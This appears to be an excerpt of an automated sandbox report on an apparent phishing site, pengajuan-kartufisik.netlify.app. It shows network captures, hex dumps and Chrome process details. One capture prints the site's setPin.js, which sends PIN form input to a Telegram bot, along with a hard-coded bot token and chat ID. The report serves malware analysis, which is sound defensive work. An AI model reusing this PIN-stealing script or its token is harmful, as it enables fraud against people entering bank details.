      2024-09-27 02:26:43 UTC4096INData Raw: ea 47 86 e8 14 c0 0f 71 86 09 3b 5a 04 13 b9 40 05 97 a7 fd 29 ed 6f a8 90 00 18 ad 6f 58 f1 dc 86 ff ec 47 b7 61 c7 a2 45 8b c6 1a 56 f7 31 f3 69 d1 65 4a a9 bc 31 e6 ff 69 ad ef 33 a0 1d 64 74 de b2 54 8b 52 f6 b9 20 7c 16 c0 d4 e0 c5 8d 99 41 8a be d2 d6 b6 e8 f5 f6 f6 c5 2b 82 63 5d 71 d9 44 00 bc 81 40 fb 52 bf 29 22 c3 cc b3 11 b8 20 7b ae fc 1a 72 2f 94 c9 30 29 32 9c 98 c0 ac 94 75 1f c3 24 ed 5b 0f 1b be db 18 fd 4b cd 4e 87 31 2a 6f 29 ab 59 d9 f4 4e 22 7c 0c a0 93 22 fb a6 00 5c 63 67 ea 5f 03 70 73 ea 5c 12 77 8b c0 e0 7f 33 8e f9 09 88 7b 18 de df 5f b6 1a 48 d1 6c 45 f4 01 22 9a 15 15 80 8a d4 df b7 b5 5d fb bf ed ed 37 7f bf 3f db 2b cd d9 32 79 66 b5 86 2a d8 87 ec 2e 9b 89 b0 91 61 08 78 0c a9 7f 6a 08 cc a6 a6 02 bb 8a d4 fb 22 fb 95 87
      Data Ascii: Gq;Z@)ooXGaEV1ieJ1i3dtTR |A+c]qD@R)" {r/0)2u$[KN1*o)YN"|"\cg_ps\w3{_HlE"]7?+2yf*.axj"
      2024-09-27 02:26:43 UTC4096INData Raw: 38 7a fe 18 5e 93 92 f5 4a 38 19 c8 4d 9c 0b b9 a7 e0 3e a7 e2 ee 37 f7 37 13 fa 52 87 0e 9d d7 fe f4 f6 b2 0c 9a 27 24 14 59 f6 2c c5 62 2e ce b3 b2 74 8a 44 80 d1 b2 db 2e 0c 16 43 bd 2b 1e e9 f8 ac e5 42 fb 1f 1f 59 20 cd b6 03 0a ac af 0a 11 c9 fa 78 1b c3 3e 5b 9c b6 f6 35 2b df d4 b1 66 55 d6 86 81 b1 00 11 e7 12 df 52 ea 5e 3b 79 28 24 6e 23 3f 01 c0 ab 51 22 5a d4 d0 d0 52 94 91 7a 7b fb aa 0e b1 0f bd 09 a0 1f 30 53 38 d1 52 9d 19 8b c5 1e 4a b4 b4 5d 5b 4c fb e3 1d a3 65 4e 19 15 68 3a e6 98 78 cc a2 bb 94 c8 bb f6 df f7 0a 84 08 07 f7 fd 03 2f a7 52 fd a4 64 cf 1e d0 53 5b 00 68 c0 24 15 1e 06 67 f0 3c 6b b2 f3 2e 27 22 a8 4e 40 9e 9f c8 01 45 d8 e9 14 48 ae e0 4a 0b d6 94 64 64 70 80 23 aa 62 e6 fe c0 0b 5c 06 ac 02 c6 93 8f 3c 85 d9 91 f9 c7
      Data Ascii: 8z^J8M>77R'$Y,b.tD.C+BY x>[5+fUR^;y($n#?Q"ZRz{0S8RJ][LeNh:x/RdS[h$g<k.'"N@EHJddp#b\<
      2024-09-27 02:26:43 UTC4096INData Raw: 94 4f e8 77 c7 a0 9a 3a 6f 79 6f ef b0 6e b6 98 68 e8 ea 58 f5 7d b1 e5 03 cc 9c e5 53 6c 60 72 b2 d0 bf d9 a1 16 40 3c 6b b7 20 00 63 cc 5e 11 bd ac b3 63 55 c7 50 cb 5b 0c ba da 57 7f d7 4e a5 de 47 44 bb fd 77 74 66 6c 9a 6f 6c 07 a0 72 79 fb ea 95 9f 1b 6a 79 c5 71 36 64 91 0c 47 16 2e 69 6c 1e 75 76 58 0d 0d 89 a9 2a ce 69 ee 34 66 82 e3 68 51 f6 57 69 88 e8 4f 00 7f 20 72 1c ae 14 1b 7c 16 5f 73 cd 75 35 c4 94 e5 d0 56 55 a1 fd f6 ca 16 fa bd c7 73 d0 6f c9 cc 7d 10 a7 b9 a3 63 55 14 b7 74 00 13 8a 60 2d 3e 76 f6 31 20 9c 9e ab 8c 7f e2 73 a7 e7 9b f0 d2 e7 0c 88 6d cb d5 d7 6f ef 19 f6 6d d4 a5 c0 81 7d 19 ab ee c8 a5 51 c9 ad bd a2 00 d7 0c 19 d2 e2 6b c3 aa 62 14 ed 37 c7 bb e3 cf fb 8f 07 3e 6e 39 c3 34 57 61 44 2b 9d 66 39 fe 9e cb c3 86 b9 0b
      Data Ascii: Ow:oyonhX}Sl`r@<k c^cUP[WNGDwtflolryjyq6dG.iluvX*i4fhQWiO r|_su5VUso}cUt`->v1 smom}Qkb7>n94WaD+f9
      2024-09-27 02:26:43 UTC4096INData Raw: a4 05 d9 64 05 e4 09 30 1d 44 2b 43 aa 46 18 c3 a8 aa 39 ec 34 d5 4c 68 1c 22 82 31 fc c3 f4 b9 ad fc 63 77 79 55 05 88 8a 70 6f 40 4f f8 53 54 71 61 63 53 db 47 4b 93 38 37 8c 31 0b 41 18 7c 4e 13 11 44 9c 07 33 7d 3b 8f 2b b4 2f 73 ae 60 a2 d3 87 42 96 08 11 86 02 e3 96 60 11 71 c5 55 db 83 0a 74 55 a8 d2 84 d9 2e 7c 29 5e b4 0f 39 4e 12 28 9e 0c 14 82 fe 10 1c e5 ef f8 1c 2e e4 23 96 7e ff 56 e5 5c 1b 7f 1b b9 da 1a 30 78 07 88 2f ba af 6e 5e 34 11 8d 3b 90 df b7 d5 01 c7 b6 1f 4f 9f ac 6d 5f b9 91 99 5e f4 94 50 ad 6f 6c 5d 36 0b 05 c0 49 a5 be 0c 90 67 bd 4e 55 2d cb e2 7b 9a 13 6d ab 2f 59 bc b8 e4 4d 43 41 30 96 79 9b aa ba 77 2d 8a 63 f3 a0 3f b7 ce 8e f6 2d 84 4c 24 89 01 79 8e 5a bc b4 65 4c d8 6b 46 88 30 2e 09 d6 92 37 bf 39 4e 40 4d fe 92 c5
      Data Ascii: d0D+CF94Lh"1cwyUpo@OSTqacSGK871A|ND3};+/s`B`qUtU.|)^9N(.#~V\0x/n^4;Om_^Pol]6IgNU-{m/YMCA0yw-c?-L$yZeLkF0.79N@M
      2024-09-27 02:26:43 UTC4096INData Raw: fd d6 40 82 f1 ec fc 85 57 10 9b 3b ed 01 32 24 9a a9 2b e8 d7 e2 31 70 d0 4e 39 ef 9c bb 7d cb 93 41 6d 04 e1 d1 79 0b be e3 10 bf df f1 b4 e5 fd 06 00 27 dd af 2f 3f 7d 9c 5d 2f bb 7c ba 2d 7f 79 49 5f 0d d1 af b5 f6 6e fd 48 a1 b2 8f 05 dc 75 fc f1 0f 1d 52 9c 91 3e b7 88 60 14 a7 5e be 65 d3 23 23 29 57 84 08 11 c6 37 c6 ed 12 a1 a8 3c 63 80 a2 6d 16 dc 08 d2 c4 78 dc 12 10 2f c8 aa 34 ce 40 4c 75 44 64 85 69 56 bc 1f cd 91 17 d2 3e 00 25 7d b6 f2 92 e7 47 a1 32 e6 aa eb 3e 36 c0 7e c7 91 0f 17 43 ae 00 20 e5 68 1b 01 1e db 15 bf 76 4a 7d 9b 0c c2 64 f1 b7 50 4c 79 05 00 a6 8b 6e a9 af 5f 98 95 1d 21 42 84 08 11 8a c2 b8 25 58 6b 9f 7e fa 19 05 ca de 49 18 86 7e bb 15 7a 57 39 ed 8f 05 08 f8 df 52 e9 c9 5d c3 49 89 9b 64 85 11 ac 30 02 23 82 df 0f d9
      Data Ascii: @W;2$+1pN9}Amy'/?}]/|-yI_nHuR>`^e##)W7<cmx/4@LuDdiV>%}G2>6~C hvJ}dPLyn_!B%Xk~I~zW9R]Id0#
      2024-09-27 02:26:43 UTC4096INData Raw: c6 9d 61 ea 70 a0 a1 a1 61 8a 15 b3 ee 57 55 8f 4b 06 55 7d ac a3 63 75 cb 48 c9 35 5a 61 8c f1 84 23 53 e0 d9 ce f6 f6 1d 77 dc d5 b5 97 a0 9b 7c 65 a7 35 34 24 ca 5a ce 13 47 0e 4b 26 93 b7 30 73 c6 fe 4d 95 8d 31 b7 34 24 12 53 ca 69 db 0d 15 5c a7 aa 1e 5b 68 22 da db b1 66 e5 d5 95 ea a3 50 c4 e2 b1 f7 7a 14 06 0a 5b 1d e9 05 00 36 f4 43 f2 2e 99 32 93 29 d3 26 8d 2c 3b 29 3f 01 91 c7 18 9f d9 9c 9b 48 2c 1f 17 6e 1b 26 14 c1 5a fb f4 8e 2d 0a 3c 91 af 5c d0 9b bf 3f df 4b b2 42 c2 99 10 2d 32 71 73 cf 67 e7 cc 19 95 24 eb e7 75 0b 4e 62 63 ee b1 a1 ec 96 bb 10 92 e5 df 29 18 e4 c8 d3 ff 21 00 29 95 3b 4e fa 9f ff 2e 78 03 c0 b3 73 8e 9f a6 c4 a7 17 b2 3c 98 8b 78 85 11 2b 17 c1 7a e9 df ff fb 4f a3 da de e5 63 bd bd bb 44 b4 cb bd 01 21 8c f0 87 93
      Data Ascii: apaWUKU}cuH5Za#Sw|e54$ZGK&0sM14$Si\[h"fPz[6C.2)&,;)?H,n&Z-<\?KB-2qsg$uNbc)!);N.xs<x+zOcD!


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      20192.168.2.6497433.72.140.1734431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:43 UTC365OUTGET /setPin.js HTTP/1.1
      Host: pengajuan-kartufisik.netlify.app
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: */*
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:43 UTC450INHTTP/1.1 200 OK
      Accept-Ranges: bytes
      Age: 0
      Cache-Control: public,max-age=0,must-revalidate
      Cache-Status: "Netlify Edge"; fwd=miss
      Content-Length: 1374
      Content-Type: application/javascript; charset=UTF-8
      Date: Fri, 27 Sep 2024 02:26:43 GMT
      Etag: "734c87f73282109f5dabecd51a905235-ssl"
      Server: Netlify
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      X-Nf-Request-Id: 01J8RMTM9VBDYDFPR6W0KHKGA7
      Connection: close
      2024-09-27 02:26:43 UTC736INData Raw: 0d 0a 20 20 20 20 63 6f 6e 73 74 20 63 68 61 74 5f 69 64 20 3d 20 27 35 38 31 39 38 37 37 39 36 32 27 2c 20 62 6f 74 49 44 20 3d 20 27 62 6f 74 36 37 34 31 37 38 35 32 34 30 3a 41 41 45 39 68 70 5f 32 6c 65 6b 6f 63 67 4a 52 65 57 58 6e 6b 52 67 69 45 47 78 56 53 48 41 2d 68 70 6b 27 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 74 65 6c 65 67 72 61 6d 55 52 4c 20 3d 20 60 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 24 7b 62 6f 74 49 44 7d 2f 73 65 6e 64 4d 65 73 73 61 67 65 60 3b 0d 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 23 73 65 74 50 69 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 20 61 73 79 6e 63 20 65 20 3d 3e 20 7b 20 2f 2f 20 57 68
      Data Ascii: const chat_id = '5819877962', botID = 'bot6741785240:AAE9hp_2lekocgJReWXnkRgiEGxVSHA-hpk'; const telegramURL = `https://api.telegram.org/${botID}/sendMessage`; document.querySelector('#setPin').addEventListener("submit", async e => { // Wh
      2024-09-27 02:26:43 UTC638INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 61 64 65 72 73 3a 20 7b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 20 2f 2f 20 54 68 69 73 20 69 73 20 72 65 71 75 69 72 65 64 20 77 68 65 6e 20 73 65 6e 64 69 6e 67 20 61 20 4a 53 4f 4e 20 62 6f 64 79 2e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 3a 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 7b 63 68 61 74 5f 69 64 2c 20 74 65 78 74 7d 29 2c 20 2f 2f 20 54 68 65 20 62 6f 64 79 20 6d 75 73 74 20 62 65 20 61 20 73 74 72 69 6e 67 2c 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 6d 65 73 73 61 67 65 53 74 61 74 75 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e
      Data Ascii: headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body. body: JSON.stringify({chat_id, text}), // The body must be a string, not an object }); const messageStatus = document.


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      21192.168.2.649747184.28.90.27443
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:43 UTC239OUTGET /fs/windows/config.json HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Encoding: identity
      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
      Range: bytes=0-2147483646
      User-Agent: Microsoft BITS/7.8
      Host: fs.microsoft.com
      2024-09-27 02:26:43 UTC514INHTTP/1.1 200 OK
      ApiVersion: Distribute 1.1
      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
      Content-Type: application/octet-stream
      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
      Server: ECAcc (lpl/EF06)
      X-CID: 11
      X-Ms-ApiVersion: Distribute 1.2
      X-Ms-Region: prod-weu-z1
      Cache-Control: public, max-age=51581
      Date: Fri, 27 Sep 2024 02:26:43 GMT
      Content-Length: 55
      Connection: close
      X-CID: 2
      2024-09-27 02:26:43 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


      020406080s020406080100

      Click to jump to process

      020406080s0.0050100MB

      Click to jump to process

      Target ID:0
      Start time:22:26:28
      Start date:26/09/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Imagebase:0x7ff684c40000
      File size:3'242'272 bytes
      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:2
      Start time:22:26:33
      Start date:26/09/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,10656444654426491281,9200762998482847054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Imagebase:0x7ff684c40000
      File size:3'242'272 bytes
      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:3
      Start time:22:26:35
      Start date:26/09/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pengajuan-kartufisik.netlify.app/"
      Imagebase:0x7ff684c40000
      File size:3'242'272 bytes
      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

      No disassembly